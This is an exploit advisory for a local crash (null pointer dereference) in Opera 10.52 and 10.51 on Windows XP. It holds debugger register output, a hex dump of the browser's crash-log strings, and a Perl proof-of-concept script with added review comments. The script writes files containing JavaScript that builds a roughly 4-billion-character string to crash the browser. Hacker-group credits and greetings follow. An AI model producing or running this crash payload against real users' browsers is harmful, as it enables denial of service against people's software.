############{In The Name Of Allah The Mercifull}################
# Title : Opera 10.52 & 10.51 null pointer
# Tested : Windows xp (sp3)
# author: R3d-D3v!L
Observed under a 32-bit assembler-level analysing debugger:
EAX 00000000 <-- null pointer
ECX 0012FFB0
EDX 7C90E514 ntdll.KiFastSystemCallRet
EBX 7FFD5000
ESP 0012FFC4
EBP 0012FFF0
ESI FFFFFFFF
EDI 7C910228 ntdll.7C910228
EIP 00404B5C opera.<ModuleEntryPoint>
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL <--??????
D 0
O 0 LastErr ERROR_NO_IMPERSONATION_TOKEN (0000051D)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -UNORM BDEC 01050104 00000000
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 1.0000000000000000000
ST7 empty 1.0000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
----------------------------------------------------
crash PoC
address<--------->hex dump<-------->ASCII
00407000 00 00 00 00 00 00 00 00 ........
00407008 00 00 00 00 00 00 00 00 ........
00407010 43 72 61 73 68 20 6C 6F Crash lo
00407018 67 20 77 72 69 74 69 6E g writin
00407020 67 20 66 61 69 6C 65 64 g failed
00407028 2C 20 25 73 21 0A 45 72 , %s!.Er
00407030 72 6F 72 20 64 65 73 63 ror desc
00407038 72 69 70 74 69 6F 6E 20 ription
00407040 66 72 6F 6D 20 73 79 73 from sys
00407048 74 65 6D 3A 20 25 73 00 tem: %s.
00407050 B0 A4 AC A8 A0 9C B4 C4 ¬ œؤ
00407058 B8 C0 BC 98 C8 94 90 8C ہ¼کب”گŒ
00407060 87 82 7E 7D 78 74 73 6E ‡‚~}xtsn
00407068 6A 69 64 60 5F 5A 56 55 jid`_ZVU
00407070 50 4C 4B 46 42 41 3C 38 PLKFBA<8
00407078 21 1D 00 00 00 00 00 00 !......
00407080 4F 50 45 52 41 2D 43 52 OPERA-CR
00407088 41 53 48 4C 4F 47 20 56 ASHLOG V
00407090 31 20 64 65 73 6B 74 6F 1 deskto
00407098 70 20 31 30 2E 35 32 20 p 10.52
004070A0 33 33 37 30 20 77 69 6E 3370 win
004070A8 64 6F 77 73 0D 0A 25 73 dows..%s
004070B0 20 63 61 75 73 65 64 20 caused
004070B8 65 78 63 65 70 74 69 6F exceptio
004070C0 6E 20 25 58 20 61 74 20 n %X at
004070C8 61 64 64 72 65 73 73 20 address
004070D0 25 30 38 58 20 28 42 61 %08X (Ba
004070D8 73 65 3A 20 25 58 29 0D se: %X).
004070E0 0A 0D 0A 52 65 67 69 73 ...Regis
004070E8 74 65 72 73 3A 0D 0A 45 ters:..E
004070F0 41 58 3D 25 30 38 58 20 AX=%08X
004070F8 20 20 45 42 58 3D 25 30 EBX=%0
00407100 38 58 20 20 20 45 43 58 8X ECX
00407108 3D 25 30 38 58 20 20 20 =%08X
00407110 45 44 58 3D 25 30 38 58 EDX=%08X
00407118 20 20 20 45 53 49 3D 25 ESI=%
00407120 30 38 58 0D 0A 45 44 49 08X..EDI
00407128 3D 25 30 38 58 20 20 20 =%08X
00407130 45 42 50 3D 25 30 38 58 EBP=%08X
00407138 20 20 20 45 53 50 3D 25 ESP=%
00407140 30 38 58 20 20 20 45 49 08X EI
00407148 50 3D 25 30 38 58 20 46 P=%08X F
00407150 4C 41 47 53 3D 25 30 38 LAGS=%08
00407158 58 0D 0A 43 53 3D 25 30 X..CS=%0
00407160 34 58 20 20 20 44 53 3D 4X DS=
00407168 25 30 34 58 20 20 20 53 %04X S
00407170 53 3D 25 30 34 58 20 20 S=%04X
00407178 20 45 53 3D 25 30 34 58 ES=%04X
00407180 20 20 20 46 53 3D 25 30 FS=%0
00407188 34 58 20 20 20 47 53 3D 4X GS=
00407190 25 30 34 58 0D 0A 46 50 %04X..FP
00407198 55 20 73 74 61 63 6B 3A U stack:
004071A0 0D 0A 25 30 34 58 25 30 ..%04X%0
004071A8 38 58 25 30 38 58 20 25 8X%08X %
004071B0 30 34 58 25 30 38 58 25 04X%08X%
004071B8 30 38 58 20 25 30 34 58 08X %04X
004071C0 25 30 38 58 25 30 38 58 %08X%08X
004071C8 0D 0A 25 30 34 58 25 30 ..%04X%0
004071D0 38 58 25 30 38 58 20 25 8X%08X %
004071D8 30 34 58 25 30 38 58 25 04X%08X%
004071E0 30 38 58 20 25 30 34 58 08X %04X
004071E8 25 30 38 58 25 30 38 58 %08X%08X
004071F0 0D 0A 25 30 34 58 25 30 ..%04X%0
004071F8 38 58 25 30 38 58 20 25 8X%08X %
00407200 30 34 58 25 30 38 58 25 04X%08X%
00407208 30 38 58 20 53 57 3D 25 08X SW=%
00407210 30 34 58 20 43 57 3D 25 04X CW=%
00407218 30 34 58 0D 0A 0D 0A 53 04X....S
00407220 74 61 63 6B 20 64 75 6D tack dum
00407228 70 3A 0D 0A 00 00 00 00 p:......
00407230 0D 0A 55 73 65 64 20 44 ..Used D
00407238 4C 4C 73 3A 0D 0A 00 00 LLs:....
00407240 0D 0A 4D 65 6D 6F 72 79 ..Memory
00407248 20 64 75 6D 70 73 3A 0D dumps:.
00407250 0A 00 00 00 20 59 40 00 .... Y@.
00407258 54 73 40 00 50 73 40 00 Ts@.Ps@.
00407260 4C 73 40 00 48 73 40 00 Ls@.Hs@.
00407268 44 73 40 00 40 73 40 00 Ds@.@s@.
00407270 3C 73 40 00 38 73 40 00 <s@.8s@.
00407278 34 73 40 00 30 73 40 00 4s@.0s@.
00407280 4F 70 65 72 61 20 63 72 Opera cr
00407288 61 73 68 65 64 20 77 68 ashed wh
00407290 69 6C 65 20 74 72 79 69 ile tryi
00407298 6E 67 20 74 6F 20 73 68 ng to sh
004072A0 6F 77 20 74 68 65 20 63 ow the c
004072A8 72 61 73 68 20 64 69 61 rash dia
004072B0 6C 6F 67 75 65 20 66 6F logue fo
004072B8 72 20 61 20 70 72 65 76 r a prev
004072C0 69 6F 75 73 20 63 72 61 ious cra
004072C8 73 68 2E 0A 41 20 63 72 sh..A cr
004072D0 61 73 68 20 6C 6F 67 20 ash log
004072D8 77 61 73 20 63 72 65 61 was crea
004072E0 74 65 64 20 68 65 72 65 ted here
004072E8 3A 0A 25 73 0A 50 6C 65 :.%s.Ple
004072F0 61 73 65 20 73 65 6E 64 ase send
004072F8 20 75 73 20 74 68 69 73 us this
00407300 20 6C 6F 67 20 6D 61 6E log man
00407308 75 61 6C 6C 79 2E 00 00 ually...
00407310 2D 63 72 61 73 68 6C 6F -crashlo
00407318 67 20 22 25 73 22 00 00 g "%s"..
00407320 D0 3D 15 00 20 00 00 00 ذ=. ...
00407328 00 00 00 00 00 00 40 00 ......@.
00407330 EB AE 80 7C FF 6F DD 77 ®€|ےoفw
00407338 AF 6A DD 77 6B 99 A0 7C ¯jفwk™ |
00407340 63 1F 83 7C 48 5D AB 7C cƒ|H]«|
00407348 00 08 81 7C 81 EF 80 7C .پ|پï€|
00407350 91 07 83 7C 75 B4 80 7C ‘ƒ|u€|
00407358 00 00 00 00 00 00 00 00 ........
00407360 02 1F 15 00 A4 22 86 7C ."†|
00407368 00 00 00 00 F4 1E BF 76 ....؟v
00407370 76 3A BF 76 4D 20 BF 76 v:؟vM ؟v
00407378 00 00 00 00 00 00 00 00 ........
00407380 70 3F 15 00 8B 79 DD 77 p?.‹yفw
00407388 05 73 DD 77 11 82 DD 77 sفw‚فw
00407390 C9 7C DD 77 CA 7F DD 77 ة|فwتفw
00407398 B8 7C DD 77 00 00 DD 77 |فw..فw
004073A0 00 00 00 00 24 2F C3 76 ....$/أv
004073A8 57 53 AA 77 DA CC A9 77 WSھwعج©w
004073B0 A4 6C A9 77 65 2D AC 77 l©we-¬w
004073B8 5F 1F A9 77 AE D6 A8 77 _©w®ضw
004073C0 DF A5 A9 77 00 00 00 00 ك¥©w....
proof of concept
From the ASCII column of the dump we can see the strings { Crash log writing failed, %s!.Error desc ription from system: %s.}
AND
{Opera crashed while trying to show the crash dialogue for a previous crash..A crash logwas created here:.%s.Please sendus thislog manually...-crashlog "%s"..}
so let's GET THE TRUST ;)
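#!\c:\perl\bin
# NOTE(review): the shebang above names a directory rather than a perl
# executable; on Windows the shell presumably ignores it, so it is kept as
# the author wrote it.
#
# Opera 10.52 local crash proof of concept (original author: R3d-D3v!L).
#
# Writes two files into the current directory, uhoh1.log and uhoh2.log,
# each wrapping a short JavaScript snippet between the <login=>/<logout=>
# header and footer lines. Both snippets try to build a string of
# 4444444444 characters: the first loops in the browser, the second
# inlines the characters into the file itself. Nothing is sent anywhere,
# and the files are opened for append ('>>'), so re-running grows them.
#
# Review notes:
#   - "A" x 4444444444 asks *this* perl process for a string of roughly
#     4 GiB before uhoh2.log is touched; on a 32-bit perl that is likely to
#     die with "Out of memory!" rather than produce the file. Left exactly
#     as written, but the surrounding I/O now reports failures instead of
#     silently continuing.
#   - The original used 2-arg open() on a bareword handle with no error
#     check and never closed it, so a failed open or a lost buffered write
#     would still print "Done". Each file is now written through one
#     helper with three-arg open, a lexical handle and checked close.
use strict;
use warnings;

print qq(
###################################################
## Opera 10.52 local crash poc ##
## Credits : information arabian security ##
## http://WwW.xp10.mE XP10_hacker ##
## Author : R3d-D3V!L <x[at]hotmail.co.jp> ##
## Greetz : xp10_HACKER DR.DASHER ##
## all member at WwW.XP10.mE ##
###################################################
);

my $header = "<login=>\n<logout=>\n";
my $footer = "</login=>\n</logout=>";

# Append $content to $path, dying with the OS error on any failure.
# close() is checked because buffered write errors only surface there.
sub append_file {
    my ($path, $content) = @_;
    open my $fh, '>>', $path or die "open $path: $!";
    print {$fh} $content or die "write $path: $!";
    close $fh or die "close $path: $!";
    return;
}

##################################################################
my $uhoh1 = "var buf = 'A';\n"
          . "while (buf.length <= 4444444444) buf+=buf;\n"
          . "alert(buf)\n";
append_file('uhoh1.log', $header . $uhoh1 . $footer);

##################################################################
# Built only after uhoh1.log is written, as in the original, so an
# allocation failure here still leaves the first file in place.
# Runtime value is identical to the original "alert(\'" ... "'\)" form;
# the escapes were dropped only because \) warns under 'use warnings'.
my $uhoh2 = "alert('" . "A" x 4444444444 . "')" . "\n";
append_file('uhoh2.log', $header . $uhoh2 . $footer);

##################################################################
print "\nDone, successfully created in the darkness !\n";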
##[~]-----------------------------{((MAGOUSH-87))}--------------------------------------- ##########
#
## Author : R3d-D3v!L <X[at]hotmail.co.jp>
# Credits to : XP10_HACKER ((xp10.com)) ##
#
##spechial SupP0RT: MY M!ND ;) & every one in the great castle of security (sevurity reason)
#
## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah &S!R-TOTTi & Abo-ShA@D ##
#
##[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
#
##[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ
## all member at XP10.com ##
#[~] !'M 4R48!4N 3XPL0!73R
#
#[~]{[(D!R 4ll 0R D!E)]};
#
#[~]---------------------------------------------------------------------------------------------
#####################################################################